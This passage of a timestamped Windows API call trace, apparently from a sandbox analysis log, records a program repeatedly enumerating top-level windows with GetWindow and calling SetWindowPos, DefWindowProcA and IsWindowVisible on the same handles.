returned 0x20016 [0057.454] GetWindow (hWnd=0x20016, uCmd=0x2) returned 0x200ae [0057.455] GetWindow (hWnd=0x200ae, uCmd=0x2) returned 0x2009e [0057.455] 
GetWindow (hWnd=0x2009e, uCmd=0x2) returned 0x2008c [0057.455] GetWindow (hWnd=0x2008c, uCmd=0x2) returned 0x2008e [0057.455] GetWindow (hWnd=0x2008e, uCmd=0x2) returned 0x20092 [0057.455] GetWindow (hWnd=0x20092, uCmd=0x2) returned 0x2009a [0057.455] GetWindow (hWnd=0x2009a, uCmd=0x2) returned 0x300a8 [0057.455] GetWindow (hWnd=0x300a8, uCmd=0x2) returned 0x20080 [0057.455] GetWindow (hWnd=0x20080, uCmd=0x2) returned 0x100f0 [0057.455] GetWindow (hWnd=0x100f0, uCmd=0x2) returned 0x100f2 [0057.455] GetWindow (hWnd=0x100f2, uCmd=0x2) returned 0x100ea [0057.455] GetWindow (hWnd=0x100ea, uCmd=0x2) returned 0x100e8 [0057.455] GetWindow (hWnd=0x100e8, uCmd=0x2) returned 0x100e4 [0057.455] GetWindow (hWnd=0x100e4, uCmd=0x2) returned 0x100da [0057.455] GetWindow (hWnd=0x100da, uCmd=0x2) returned 0x50076 [0057.455] GetWindow (hWnd=0x50076, uCmd=0x2) returned 0x1006c [0057.455] GetWindow (hWnd=0x1006c, uCmd=0x2) returned 0x1006a [0057.455] GetWindow (hWnd=0x1006a, uCmd=0x2) returned 0x10062 [0057.455] GetWindow (hWnd=0x10062, uCmd=0x2) returned 0x10050 [0057.455] GetWindow (hWnd=0x10050, uCmd=0x2) returned 0x200fa [0057.455] GetWindow (hWnd=0x200fa, uCmd=0x2) returned 0x200fc [0057.455] GetWindow (hWnd=0x200fc, uCmd=0x2) returned 0x100f6 [0057.455] GetWindow (hWnd=0x100f6, uCmd=0x2) returned 0x100f8 [0057.455] GetWindow (hWnd=0x100f8, uCmd=0x2) returned 0x1004c [0057.455] GetWindow (hWnd=0x1004c, uCmd=0x2) returned 0x10038 [0057.455] GetWindow (hWnd=0x10038, uCmd=0x2) returned 0x10030 [0057.456] GetWindow (hWnd=0x10030, uCmd=0x2) returned 0x2002c [0057.456] GetWindow (hWnd=0x2002c, uCmd=0x2) returned 0x1002e [0057.456] GetWindow (hWnd=0x1002e, uCmd=0x2) returned 0x20026 [0057.456] GetWindow (hWnd=0x20026, uCmd=0x2) returned 0x1002a [0057.456] GetWindow (hWnd=0x1002a, uCmd=0x2) returned 0x20028 [0057.456] GetWindow (hWnd=0x20028, uCmd=0x2) returned 0x100ee [0057.456] GetWindow (hWnd=0x100ee, uCmd=0x2) returned 0x100ec [0057.456] GetWindow (hWnd=0x100ec, uCmd=0x2) returned 
0x100ca [0057.456] GetWindow (hWnd=0x100ca, uCmd=0x2) returned 0x0 [0057.456] SetWindowPos (hWnd=0x601a8, hWndInsertAfter=0x0, X=0, Y=0, cx=0, cy=0, uFlags=0x13) returned 1 [0057.456] DefWindowProcA (hWnd=0x601a8, Msg=0x46, wParam=0x0, lParam=0x12f134) returned 0x0 [0057.456] DefWindowProcA (hWnd=0x301fc, Msg=0x46, wParam=0x0, lParam=0x12f134) returned 0x0 [0057.456] GetWindow (hWnd=0x601a8, uCmd=0x0) returned 0x10118 [0057.456] GetWindow (hWnd=0x10118, uCmd=0x2) returned 0x10112 [0057.456] GetWindow (hWnd=0x10112, uCmd=0x2) returned 0x10110 [0057.456] GetWindow (hWnd=0x10110, uCmd=0x2) returned 0x200aa [0057.456] GetWindow (hWnd=0x200aa, uCmd=0x2) returned 0x200c6 [0057.456] GetWindow (hWnd=0x200c6, uCmd=0x2) returned 0x200d6 [0057.456] GetWindow (hWnd=0x200d6, uCmd=0x2) returned 0x200c4 [0057.456] GetWindow (hWnd=0x200c4, uCmd=0x2) returned 0x1005e [0057.456] GetWindow (hWnd=0x1005e, uCmd=0x2) returned 0x1005c [0057.456] GetWindow (hWnd=0x1005c, uCmd=0x2) returned 0x10048 [0057.456] GetWindow (hWnd=0x10048, uCmd=0x2) returned 0x10072 [0057.456] GetWindow (hWnd=0x10072, uCmd=0x2) returned 0x10066 [0057.456] GetWindow (hWnd=0x10066, uCmd=0x2) returned 0x10064 [0057.456] GetWindow (hWnd=0x10064, uCmd=0x2) returned 0x10060 [0057.457] GetWindow (hWnd=0x10060, uCmd=0x2) returned 0x1003e [0057.457] GetWindow (hWnd=0x1003e, uCmd=0x2) returned 0x1003a [0057.457] GetWindow (hWnd=0x1003a, uCmd=0x2) returned 0x10040 [0057.457] GetWindow (hWnd=0x10040, uCmd=0x2) returned 0x1003c [0057.457] GetWindow (hWnd=0x1003c, uCmd=0x2) returned 0x100d2 [0057.457] GetWindow (hWnd=0x100d2, uCmd=0x2) returned 0x5007c [0057.457] GetWindow (hWnd=0x5007c, uCmd=0x2) returned 0x10074 [0057.457] GetWindow (hWnd=0x10074, uCmd=0x2) returned 0x601a8 [0057.457] IsWindowVisible (hWnd=0x601a8) returned 0 [0057.457] GetWindow (hWnd=0x601a8, uCmd=0x2) returned 0x70104 [0057.457] GetWindow (hWnd=0x70104, uCmd=0x2) returned 0x301fc [0057.457] GetWindow (hWnd=0x301fc, uCmd=0x2) returned 0x401e4 [0057.457] 
GetWindow (hWnd=0x401e4, uCmd=0x2) returned 0x101e2 [0057.457] GetWindow (hWnd=0x101e2, uCmd=0x2) returned 0x101ac [0057.457] GetWindow (hWnd=0x101ac, uCmd=0x2) returned 0x601a4 [0057.457] GetWindow (hWnd=0x601a4, uCmd=0x2) returned 0x201d4 [0057.457] GetWindow (hWnd=0x201d4, uCmd=0x2) returned 0x101b6 [0057.457] GetWindow (hWnd=0x101b6, uCmd=0x2) returned 0x101c8 [0057.457] GetWindow (hWnd=0x101c8, uCmd=0x2) returned 0x201c4 [0057.457] GetWindow (hWnd=0x201c4, uCmd=0x2) returned 0x101b8 [0057.457] GetWindow (hWnd=0x101b8, uCmd=0x2) returned 0x101aa [0057.457] GetWindow (hWnd=0x101aa, uCmd=0x2) returned 0x10192 [0057.457] GetWindow (hWnd=0x10192, uCmd=0x2) returned 0x10190 [0057.457] GetWindow (hWnd=0x10190, uCmd=0x2) returned 0x1018e [0057.457] GetWindow (hWnd=0x1018e, uCmd=0x2) returned 0x1018c [0057.457] GetWindow (hWnd=0x1018c, uCmd=0x2) returned 0x1018a [0057.457] GetWindow (hWnd=0x1018a, uCmd=0x2) returned 0x10188 [0057.457] GetWindow (hWnd=0x10188, uCmd=0x2) returned 0x10184 [0057.457] GetWindow (hWnd=0x10184, uCmd=0x2) returned 0x10186 [0057.457] GetWindow (hWnd=0x10186, uCmd=0x2) returned 0x10180 [0057.457] GetWindow (hWnd=0x10180, uCmd=0x2) returned 0x10182 [0057.458] GetWindow (hWnd=0x10182, uCmd=0x2) returned 0x1017c [0057.458] GetWindow (hWnd=0x1017c, uCmd=0x2) returned 0x1017e [0057.458] GetWindow (hWnd=0x1017e, uCmd=0x2) returned 0x10178 [0057.458] GetWindow (hWnd=0x10178, uCmd=0x2) returned 0x1017a [0057.458] GetWindow (hWnd=0x1017a, uCmd=0x2) returned 0x10174 [0057.458] GetWindow (hWnd=0x10174, uCmd=0x2) returned 0x10176 [0057.458] GetWindow (hWnd=0x10176, uCmd=0x2) returned 0x10170 [0057.458] GetWindow (hWnd=0x10170, uCmd=0x2) returned 0x10172 [0057.458] GetWindow (hWnd=0x10172, uCmd=0x2) returned 0x1016c [0057.458] GetWindow (hWnd=0x1016c, uCmd=0x2) returned 0x1016e [0057.458] GetWindow (hWnd=0x1016e, uCmd=0x2) returned 0x10168 [0057.458] GetWindow (hWnd=0x10168, uCmd=0x2) returned 0x1016a [0057.458] GetWindow (hWnd=0x1016a, uCmd=0x2) returned 
0x10164 [0057.458] GetWindow (hWnd=0x10164, uCmd=0x2) returned 0x10166 [0057.458] GetWindow (hWnd=0x10166, uCmd=0x2) returned 0x10160 [0057.458] GetWindow (hWnd=0x10160, uCmd=0x2) returned 0x10162 [0057.458] GetWindow (hWnd=0x10162, uCmd=0x2) returned 0x1015c [0057.458] GetWindow (hWnd=0x1015c, uCmd=0x2) returned 0x1015e [0057.458] GetWindow (hWnd=0x1015e, uCmd=0x2) returned 0x7013a [0057.458] GetWindow (hWnd=0x7013a, uCmd=0x2) returned 0x1015a [0057.458] GetWindow (hWnd=0x1015a, uCmd=0x2) returned 0x10156 [0057.458] GetWindow (hWnd=0x10156, uCmd=0x2) returned 0x10158 [0057.458] GetWindow (hWnd=0x10158, uCmd=0x2) returned 0x10150 [0057.458] GetWindow (hWnd=0x10150, uCmd=0x2) returned 0x10154 [0057.458] GetWindow (hWnd=0x10154, uCmd=0x2) returned 0x1014a [0057.458] GetWindow (hWnd=0x1014a, uCmd=0x2) returned 0x1014e [0057.458] GetWindow (hWnd=0x1014e, uCmd=0x2) returned 0x10144 [0057.458] GetWindow (hWnd=0x10144, uCmd=0x2) returned 0x10148 [0057.458] GetWindow (hWnd=0x10148, uCmd=0x2) returned 0x1013e [0057.459] GetWindow (hWnd=0x1013e, uCmd=0x2) returned 0x10142 [0057.459] GetWindow (hWnd=0x10142, uCmd=0x2) returned 0x10138 [0057.459] GetWindow (hWnd=0x10138, uCmd=0x2) returned 0x1013c [0057.459] GetWindow (hWnd=0x1013c, uCmd=0x2) returned 0x10134 [0057.459] GetWindow (hWnd=0x10134, uCmd=0x2) returned 0x10136 [0057.459] GetWindow (hWnd=0x10136, uCmd=0x2) returned 0x400dc [0057.459] GetWindow (hWnd=0x400dc, uCmd=0x2) returned 0x300e0 [0057.459] GetWindow (hWnd=0x300e0, uCmd=0x2) returned 0x10130 [0057.459] GetWindow (hWnd=0x10130, uCmd=0x2) returned 0x10122 [0057.459] GetWindow (hWnd=0x10122, uCmd=0x2) returned 0x10120 [0057.459] GetWindow (hWnd=0x10120, uCmd=0x2) returned 0x20116 [0057.459] GetWindow (hWnd=0x20116, uCmd=0x2) returned 0x1010a [0057.459] GetWindow (hWnd=0x1010a, uCmd=0x2) returned 0x1010c [0057.459] GetWindow (hWnd=0x1010c, uCmd=0x2) returned 0x2001e [0057.459] GetWindow (hWnd=0x2001e, uCmd=0x2) returned 0x20020 [0057.459] GetWindow (hWnd=0x20020, 
uCmd=0x2) returned 0x2001c [0057.459] GetWindow (hWnd=0x2001c, uCmd=0x2) returned 0x20016 [0057.459] GetWindow (hWnd=0x20016, uCmd=0x2) returned 0x200ae [0057.459] GetWindow (hWnd=0x200ae, uCmd=0x2) returned 0x2009e [0057.459] GetWindow (hWnd=0x2009e, uCmd=0x2) returned 0x2008c [0057.459] GetWindow (hWnd=0x2008c, uCmd=0x2) returned 0x2008e [0057.459] GetWindow (hWnd=0x2008e, uCmd=0x2) returned 0x20092 [0057.459] GetWindow (hWnd=0x20092, uCmd=0x2) returned 0x2009a [0057.459] GetWindow (hWnd=0x2009a, uCmd=0x2) returned 0x300a8 [0057.459] GetWindow (hWnd=0x300a8, uCmd=0x2) returned 0x20080 [0057.459] GetWindow (hWnd=0x20080, uCmd=0x2) returned 0x100f0 [0057.459] GetWindow (hWnd=0x100f0, uCmd=0x2) returned 0x100f2 [0057.459] GetWindow (hWnd=0x100f2, uCmd=0x2) returned 0x100ea [0057.459] GetWindow (hWnd=0x100ea, uCmd=0x2) returned 0x100e8 [0057.459] GetWindow (hWnd=0x100e8, uCmd=0x2) returned 0x100e4 [0057.459] GetWindow (hWnd=0x100e4, uCmd=0x2) returned 0x100da [0057.459] GetWindow (hWnd=0x100da, uCmd=0x2) returned 0x50076 [0057.460] GetWindow (hWnd=0x50076, uCmd=0x2) returned 0x1006c [0057.460] GetWindow (hWnd=0x1006c, uCmd=0x2) returned 0x1006a [0057.460] GetWindow (hWnd=0x1006a, uCmd=0x2) returned 0x10062 [0057.460] GetWindow (hWnd=0x10062, uCmd=0x2) returned 0x10050 [0057.460] GetWindow (hWnd=0x10050, uCmd=0x2) returned 0x200fa [0057.460] GetWindow (hWnd=0x200fa, uCmd=0x2) returned 0x200fc [0057.460] GetWindow (hWnd=0x200fc, uCmd=0x2) returned 0x100f6 [0057.460] GetWindow (hWnd=0x100f6, uCmd=0x2) returned 0x100f8 [0057.460] GetWindow (hWnd=0x100f8, uCmd=0x2) returned 0x1004c [0057.460] GetWindow (hWnd=0x1004c, uCmd=0x2) returned 0x10038 [0057.460] GetWindow (hWnd=0x10038, uCmd=0x2) returned 0x10030 [0057.460] GetWindow (hWnd=0x10030, uCmd=0x2) returned 0x2002c [0057.460] GetWindow (hWnd=0x2002c, uCmd=0x2) returned 0x1002e [0057.460] GetWindow (hWnd=0x1002e, uCmd=0x2) returned 0x20026 [0057.460] GetWindow (hWnd=0x20026, uCmd=0x2) returned 0x1002a [0057.460] 
GetWindow (hWnd=0x1002a, uCmd=0x2) returned 0x20028 [0057.460] GetWindow (hWnd=0x20028, uCmd=0x2) returned 0x100ee [0057.460] GetWindow (hWnd=0x100ee, uCmd=0x2) returned 0x100ec [0057.460] GetWindow (hWnd=0x100ec, uCmd=0x2) returned 0x100ca [0057.460] GetWindow (hWnd=0x100ca, uCmd=0x2) returned 0x0 [0057.460] SetWindowPos (hWnd=0x601a8, hWndInsertAfter=0x0, X=0, Y=0, cx=0, cy=0, uFlags=0x13) returned 1 [0057.460] DefWindowProcA (hWnd=0x601a8, Msg=0x46, wParam=0x0, lParam=0x12f134) returned 0x0 [0057.460] DefWindowProcA (hWnd=0x301fc, Msg=0x46, wParam=0x0, lParam=0x12f134) returned 0x0 [0057.460] GetWindow (hWnd=0x601a8, uCmd=0x0) returned 0x10118 [0057.460] GetWindow (hWnd=0x10118, uCmd=0x2) returned 0x10112 [0057.460] GetWindow (hWnd=0x10112, uCmd=0x2) returned 0x10110 [0057.460] GetWindow (hWnd=0x10110, uCmd=0x2) returned 0x200aa [0057.461] GetWindow (hWnd=0x200aa, uCmd=0x2) returned 0x200c6 [0057.461] GetWindow (hWnd=0x200c6, uCmd=0x2) returned 0x200d6 [0057.461] GetWindow (hWnd=0x200d6, uCmd=0x2) returned 0x200c4 [0057.461] GetWindow (hWnd=0x200c4, uCmd=0x2) returned 0x1005e [0057.461] GetWindow (hWnd=0x1005e, uCmd=0x2) returned 0x1005c [0057.461] GetWindow (hWnd=0x1005c, uCmd=0x2) returned 0x10048 [0057.461] GetWindow (hWnd=0x10048, uCmd=0x2) returned 0x10072 [0057.461] GetWindow (hWnd=0x10072, uCmd=0x2) returned 0x10066 [0057.461] GetWindow (hWnd=0x10066, uCmd=0x2) returned 0x10064 [0057.461] GetWindow (hWnd=0x10064, uCmd=0x2) returned 0x10060 [0057.461] GetWindow (hWnd=0x10060, uCmd=0x2) returned 0x1003e [0057.461] GetWindow (hWnd=0x1003e, uCmd=0x2) returned 0x1003a [0057.461] GetWindow (hWnd=0x1003a, uCmd=0x2) returned 0x10040 [0057.461] GetWindow (hWnd=0x10040, uCmd=0x2) returned 0x1003c [0057.461] GetWindow (hWnd=0x1003c, uCmd=0x2) returned 0x100d2 [0057.461] GetWindow (hWnd=0x100d2, uCmd=0x2) returned 0x5007c [0057.461] GetWindow (hWnd=0x5007c, uCmd=0x2) returned 0x10074 [0057.461] GetWindow (hWnd=0x10074, uCmd=0x2) returned 0x601a8 [0057.461] 
IsWindowVisible (hWnd=0x601a8) returned 0 [0057.461] GetWindow (hWnd=0x601a8, uCmd=0x2) returned 0x70104 [0057.461] GetWindow (hWnd=0x70104, uCmd=0x2) returned 0x301fc [0057.461] GetWindow (hWnd=0x301fc, uCmd=0x2) returned 0x401e4 [0057.461] GetWindow (hWnd=0x401e4, uCmd=0x2) returned 0x101e2 [0057.461] GetWindow (hWnd=0x101e2, uCmd=0x2) returned 0x101ac [0057.461] GetWindow (hWnd=0x101ac, uCmd=0x2) returned 0x601a4 [0057.461] GetWindow (hWnd=0x601a4, uCmd=0x2) returned 0x201d4 [0057.461] GetWindow (hWnd=0x201d4, uCmd=0x2) returned 0x101b6 [0057.461] GetWindow (hWnd=0x101b6, uCmd=0x2) returned 0x101c8 [0057.461] GetWindow (hWnd=0x101c8, uCmd=0x2) returned 0x201c4 [0057.461] GetWindow (hWnd=0x201c4, uCmd=0x2) returned 0x101b8 [0057.462] GetWindow (hWnd=0x101b8, uCmd=0x2) returned 0x101aa [0057.462] GetWindow (hWnd=0x101aa, uCmd=0x2) returned 0x10192 [0057.462] GetWindow (hWnd=0x10192, uCmd=0x2) returned 0x10190 [0057.462] GetWindow (hWnd=0x10190, uCmd=0x2) returned 0x1018e [0057.462] GetWindow (hWnd=0x1018e, uCmd=0x2) returned 0x1018c [0057.462] GetWindow (hWnd=0x1018c, uCmd=0x2) returned 0x1018a [0057.462] GetWindow (hWnd=0x1018a, uCmd=0x2) returned 0x10188 [0057.462] GetWindow (hWnd=0x10188, uCmd=0x2) returned 0x10184 [0057.462] GetWindow (hWnd=0x10184, uCmd=0x2) returned 0x10186 [0057.462] GetWindow (hWnd=0x10186, uCmd=0x2) returned 0x10180 [0057.462] GetWindow (hWnd=0x10180, uCmd=0x2) returned 0x10182 [0057.462] GetWindow (hWnd=0x10182, uCmd=0x2) returned 0x1017c [0057.462] GetWindow (hWnd=0x1017c, uCmd=0x2) returned 0x1017e [0057.463] GetWindow (hWnd=0x1017e, uCmd=0x2) returned 0x10178 [0057.463] GetWindow (hWnd=0x10178, uCmd=0x2) returned 0x1017a [0057.463] GetWindow (hWnd=0x1017a, uCmd=0x2) returned 0x10174 [0057.463] GetWindow (hWnd=0x10174, uCmd=0x2) returned 0x10176 [0057.463] GetWindow (hWnd=0x10176, uCmd=0x2) returned 0x10170 [0057.463] GetWindow (hWnd=0x10170, uCmd=0x2) returned 0x10172 [0057.463] GetWindow (hWnd=0x10172, uCmd=0x2) returned 0x1016c 
[0057.463] GetWindow (hWnd=0x1016c, uCmd=0x2) returned 0x1016e [0057.463] GetWindow (hWnd=0x1016e, uCmd=0x2) returned 0x10168 [0057.463] GetWindow (hWnd=0x10168, uCmd=0x2) returned 0x1016a [0057.463] GetWindow (hWnd=0x1016a, uCmd=0x2) returned 0x10164 [0057.463] GetWindow (hWnd=0x10164, uCmd=0x2) returned 0x10166 [0057.463] GetWindow (hWnd=0x10166, uCmd=0x2) returned 0x10160 [0057.463] GetWindow (hWnd=0x10160, uCmd=0x2) returned 0x10162 [0057.463] GetWindow (hWnd=0x10162, uCmd=0x2) returned 0x1015c [0057.463] GetWindow (hWnd=0x1015c, uCmd=0x2) returned 0x1015e [0057.463] GetWindow (hWnd=0x1015e, uCmd=0x2) returned 0x7013a [0057.463] GetWindow (hWnd=0x7013a, uCmd=0x2) returned 0x1015a [0057.463] GetWindow (hWnd=0x1015a, uCmd=0x2) returned 0x10156 [0057.463] GetWindow (hWnd=0x10156, uCmd=0x2) returned 0x10158 [0057.463] GetWindow (hWnd=0x10158, uCmd=0x2) returned 0x10150 [0057.463] GetWindow (hWnd=0x10150, uCmd=0x2) returned 0x10154 [0057.463] GetWindow (hWnd=0x10154, uCmd=0x2) returned 0x1014a [0057.463] GetWindow (hWnd=0x1014a, uCmd=0x2) returned 0x1014e [0057.464] GetWindow (hWnd=0x1014e, uCmd=0x2) returned 0x10144 [0057.464] GetWindow (hWnd=0x10144, uCmd=0x2) returned 0x10148 [0057.464] GetWindow (hWnd=0x10148, uCmd=0x2) returned 0x1013e [0057.464] GetWindow (hWnd=0x1013e, uCmd=0x2) returned 0x10142 [0057.464] GetWindow (hWnd=0x10142, uCmd=0x2) returned 0x10138 [0057.464] GetWindow (hWnd=0x10138, uCmd=0x2) returned 0x1013c [0057.464] GetWindow (hWnd=0x1013c, uCmd=0x2) returned 0x10134 [0057.464] GetWindow (hWnd=0x10134, uCmd=0x2) returned 0x10136 [0057.464] GetWindow (hWnd=0x10136, uCmd=0x2) returned 0x400dc [0057.464] GetWindow (hWnd=0x400dc, uCmd=0x2) returned 0x300e0 [0057.464] GetWindow (hWnd=0x300e0, uCmd=0x2) returned 0x10130 [0057.464] GetWindow (hWnd=0x10130, uCmd=0x2) returned 0x10122 [0057.464] GetWindow (hWnd=0x10122, uCmd=0x2) returned 0x10120 [0057.464] GetWindow (hWnd=0x10120, uCmd=0x2) returned 0x20116 [0057.464] GetWindow (hWnd=0x20116, uCmd=0x2) 
returned 0x1010a [0057.464] GetWindow (hWnd=0x1010a, uCmd=0x2) returned 0x1010c [0057.464] GetWindow (hWnd=0x1010c, uCmd=0x2) returned 0x2001e [0057.464] GetWindow (hWnd=0x2001e, uCmd=0x2) returned 0x20020 [0057.464] GetWindow (hWnd=0x20020, uCmd=0x2) returned 0x2001c [0057.464] GetWindow (hWnd=0x2001c, uCmd=0x2) returned 0x20016 [0057.464] GetWindow (hWnd=0x20016, uCmd=0x2) returned 0x200ae [0057.464] GetWindow (hWnd=0x200ae, uCmd=0x2) returned 0x2009e [0057.464] GetWindow (hWnd=0x2009e, uCmd=0x2) returned 0x2008c [0057.464] GetWindow (hWnd=0x2008c, uCmd=0x2) returned 0x2008e [0057.464] GetWindow (hWnd=0x2008e, uCmd=0x2) returned 0x20092 [0057.465] GetWindow (hWnd=0x20092, uCmd=0x2) returned 0x2009a [0057.465] GetWindow (hWnd=0x2009a, uCmd=0x2) returned 0x300a8 [0057.465] GetWindow (hWnd=0x300a8, uCmd=0x2) returned 0x20080 [0057.465] GetWindow (hWnd=0x20080, uCmd=0x2) returned 0x100f0 [0057.465] GetWindow (hWnd=0x100f0, uCmd=0x2) returned 0x100f2 [0057.465] GetWindow (hWnd=0x100f2, uCmd=0x2) returned 0x100ea [0057.465] GetWindow (hWnd=0x100ea, uCmd=0x2) returned 0x100e8 [0057.465] GetWindow (hWnd=0x100e8, uCmd=0x2) returned 0x100e4 [0057.465] GetWindow (hWnd=0x100e4, uCmd=0x2) returned 0x100da [0057.465] GetWindow (hWnd=0x100da, uCmd=0x2) returned 0x50076 [0057.465] GetWindow (hWnd=0x50076, uCmd=0x2) returned 0x1006c [0057.465] GetWindow (hWnd=0x1006c, uCmd=0x2) returned 0x1006a [0057.465] GetWindow (hWnd=0x1006a, uCmd=0x2) returned 0x10062 [0057.465] GetWindow (hWnd=0x10062, uCmd=0x2) returned 0x10050 [0057.465] GetWindow (hWnd=0x10050, uCmd=0x2) returned 0x200fa [0057.465] GetWindow (hWnd=0x200fa, uCmd=0x2) returned 0x200fc [0057.465] GetWindow (hWnd=0x200fc, uCmd=0x2) returned 0x100f6 [0057.465] GetWindow (hWnd=0x100f6, uCmd=0x2) returned 0x100f8 [0057.465] GetWindow (hWnd=0x100f8, uCmd=0x2) returned 0x1004c [0057.465] GetWindow (hWnd=0x1004c, uCmd=0x2) returned 0x10038 [0057.465] GetWindow (hWnd=0x10038, uCmd=0x2) returned 0x10030 [0057.465] GetWindow 
(hWnd=0x10030, uCmd=0x2) returned 0x2002c [0057.465] GetWindow (hWnd=0x2002c, uCmd=0x2) returned 0x1002e [0057.465] GetWindow (hWnd=0x1002e, uCmd=0x2) returned 0x20026 [0057.466] GetWindow (hWnd=0x20026, uCmd=0x2) returned 0x1002a [0057.466] GetWindow (hWnd=0x1002a, uCmd=0x2) returned 0x20028 [0057.466] GetWindow (hWnd=0x20028, uCmd=0x2) returned 0x100ee [0057.466] GetWindow (hWnd=0x100ee, uCmd=0x2) returned 0x100ec [0057.466] GetWindow (hWnd=0x100ec, uCmd=0x2) returned 0x100ca [0057.466] GetWindow (hWnd=0x100ca, uCmd=0x2) returned 0x0 [0057.466] SetWindowPos (hWnd=0x601a8, hWndInsertAfter=0x0, X=0, Y=0, cx=0, cy=0, uFlags=0x13) returned 1 [0057.466] DefWindowProcA (hWnd=0x601a8, Msg=0x46, wParam=0x0, lParam=0x12f134) returned 0x0 [0057.466] DefWindowProcA (hWnd=0x301fc, Msg=0x46, wParam=0x0, lParam=0x12f134) returned 0x0 [0057.466] GetWindow (hWnd=0x601a8, uCmd=0x0) returned 0x10118 [0057.466] GetWindow (hWnd=0x10118, uCmd=0x2) returned 0x10112 [0057.466] GetWindow (hWnd=0x10112, uCmd=0x2) returned 0x10110 [0057.466] GetWindow (hWnd=0x10110, uCmd=0x2) returned 0x200aa [0057.466] GetWindow (hWnd=0x200aa, uCmd=0x2) returned 0x200c6 [0057.466] GetWindow (hWnd=0x200c6, uCmd=0x2) returned 0x200d6 [0057.466] GetWindow (hWnd=0x200d6, uCmd=0x2) returned 0x200c4 [0057.466] GetWindow (hWnd=0x200c4, uCmd=0x2) returned 0x1005e [0057.466] GetWindow (hWnd=0x1005e, uCmd=0x2) returned 0x1005c [0057.466] GetWindow (hWnd=0x1005c, uCmd=0x2) returned 0x10048 [0057.466] GetWindow (hWnd=0x10048, uCmd=0x2) returned 0x10072 [0057.466] GetWindow (hWnd=0x10072, uCmd=0x2) returned 0x10066 [0057.466] GetWindow (hWnd=0x10066, uCmd=0x2) returned 0x10064 [0057.466] GetWindow (hWnd=0x10064, uCmd=0x2) returned 0x10060 [0057.466] GetWindow (hWnd=0x10060, uCmd=0x2) returned 0x1003e [0057.466] GetWindow (hWnd=0x1003e, uCmd=0x2) returned 0x1003a [0057.466] GetWindow (hWnd=0x1003a, uCmd=0x2) returned 0x10040 [0057.466] GetWindow (hWnd=0x10040, uCmd=0x2) returned 0x1003c [0057.466] GetWindow 
(hWnd=0x1003c, uCmd=0x2) returned 0x100d2 [0057.467] GetWindow (hWnd=0x100d2, uCmd=0x2) returned 0x5007c [0057.467] GetWindow (hWnd=0x5007c, uCmd=0x2) returned 0x10074 [0057.467] GetWindow (hWnd=0x10074, uCmd=0x2) returned 0x601a8 [0057.467] IsWindowVisible (hWnd=0x601a8) returned 0 [0057.467] GetWindow (hWnd=0x601a8, uCmd=0x2) returned 0x70104 [0057.467] GetWindow (hWnd=0x70104, uCmd=0x2) returned 0x301fc [0057.467] GetWindow (hWnd=0x301fc, uCmd=0x2) returned 0x401e4 [0057.467] GetWindow (hWnd=0x401e4, uCmd=0x2) returned 0x101e2 [0057.467] GetWindow (hWnd=0x101e2, uCmd=0x2) returned 0x101ac [0057.467] GetWindow (hWnd=0x101ac, uCmd=0x2) returned 0x601a4 [0057.467] GetWindow (hWnd=0x601a4, uCmd=0x2) returned 0x201d4 [0057.467] GetWindow (hWnd=0x201d4, uCmd=0x2) returned 0x101b6 [0057.467] GetWindow (hWnd=0x101b6, uCmd=0x2) returned 0x101c8 [0057.467] GetWindow (hWnd=0x101c8, uCmd=0x2) returned 0x201c4 [0057.467] GetWindow (hWnd=0x201c4, uCmd=0x2) returned 0x101b8 [0057.467] GetWindow (hWnd=0x101b8, uCmd=0x2) returned 0x101aa [0057.467] GetWindow (hWnd=0x101aa, uCmd=0x2) returned 0x10192 [0057.467] GetWindow (hWnd=0x10192, uCmd=0x2) returned 0x10190 [0057.467] GetWindow (hWnd=0x10190, uCmd=0x2) returned 0x1018e [0057.467] GetWindow (hWnd=0x1018e, uCmd=0x2) returned 0x1018c [0057.467] GetWindow (hWnd=0x1018c, uCmd=0x2) returned 0x1018a [0057.467] GetWindow (hWnd=0x1018a, uCmd=0x2) returned 0x10188 [0057.467] GetWindow (hWnd=0x10188, uCmd=0x2) returned 0x10184 [0057.467] GetWindow (hWnd=0x10184, uCmd=0x2) returned 0x10186 [0057.467] GetWindow (hWnd=0x10186, uCmd=0x2) returned 0x10180 [0057.467] GetWindow (hWnd=0x10180, uCmd=0x2) returned 0x10182 [0057.467] GetWindow (hWnd=0x10182, uCmd=0x2) returned 0x1017c [0057.467] GetWindow (hWnd=0x1017c, uCmd=0x2) returned 0x1017e [0057.467] GetWindow (hWnd=0x1017e, uCmd=0x2) returned 0x10178 [0057.467] GetWindow (hWnd=0x10178, uCmd=0x2) returned 0x1017a [0057.467] GetWindow (hWnd=0x1017a, uCmd=0x2) returned 0x10174 [0057.468] 
GetWindow (hWnd=0x10174, uCmd=0x2) returned 0x10176 [0057.468] GetWindow (hWnd=0x10176, uCmd=0x2) returned 0x10170 [0057.468] GetWindow (hWnd=0x10170, uCmd=0x2) returned 0x10172 [0057.468] GetWindow (hWnd=0x10172, uCmd=0x2) returned 0x1016c [0057.468] GetWindow (hWnd=0x1016c, uCmd=0x2) returned 0x1016e [0057.468] GetWindow (hWnd=0x1016e, uCmd=0x2) returned 0x10168 [0057.468] GetWindow (hWnd=0x10168, uCmd=0x2) returned 0x1016a [0057.468] GetWindow (hWnd=0x1016a, uCmd=0x2) returned 0x10164 [0057.468] GetWindow (hWnd=0x10164, uCmd=0x2) returned 0x10166 [0057.468] GetWindow (hWnd=0x10166, uCmd=0x2) returned 0x10160 [0057.468] GetWindow (hWnd=0x10160, uCmd=0x2) returned 0x10162 [0057.468] GetWindow (hWnd=0x10162, uCmd=0x2) returned 0x1015c [0057.468] GetWindow (hWnd=0x1015c, uCmd=0x2) returned 0x1015e [0057.468] GetWindow (hWnd=0x1015e, uCmd=0x2) returned 0x7013a [0057.468] GetWindow (hWnd=0x7013a, uCmd=0x2) returned 0x1015a [0057.468] GetWindow (hWnd=0x1015a, uCmd=0x2) returned 0x10156 [0057.468] GetWindow (hWnd=0x10156, uCmd=0x2) returned 0x10158 [0057.468] GetWindow (hWnd=0x10158, uCmd=0x2) returned 0x10150 [0057.468] GetWindow (hWnd=0x10150, uCmd=0x2) returned 0x10154 [0057.468] GetWindow (hWnd=0x10154, uCmd=0x2) returned 0x1014a [0057.468] GetWindow (hWnd=0x1014a, uCmd=0x2) returned 0x1014e [0057.468] GetWindow (hWnd=0x1014e, uCmd=0x2) returned 0x10144 [0057.468] GetWindow (hWnd=0x10144, uCmd=0x2) returned 0x10148 [0057.468] GetWindow (hWnd=0x10148, uCmd=0x2) returned 0x1013e [0057.468] GetWindow (hWnd=0x1013e, uCmd=0x2) returned 0x10142 [0057.468] GetWindow (hWnd=0x10142, uCmd=0x2) returned 0x10138 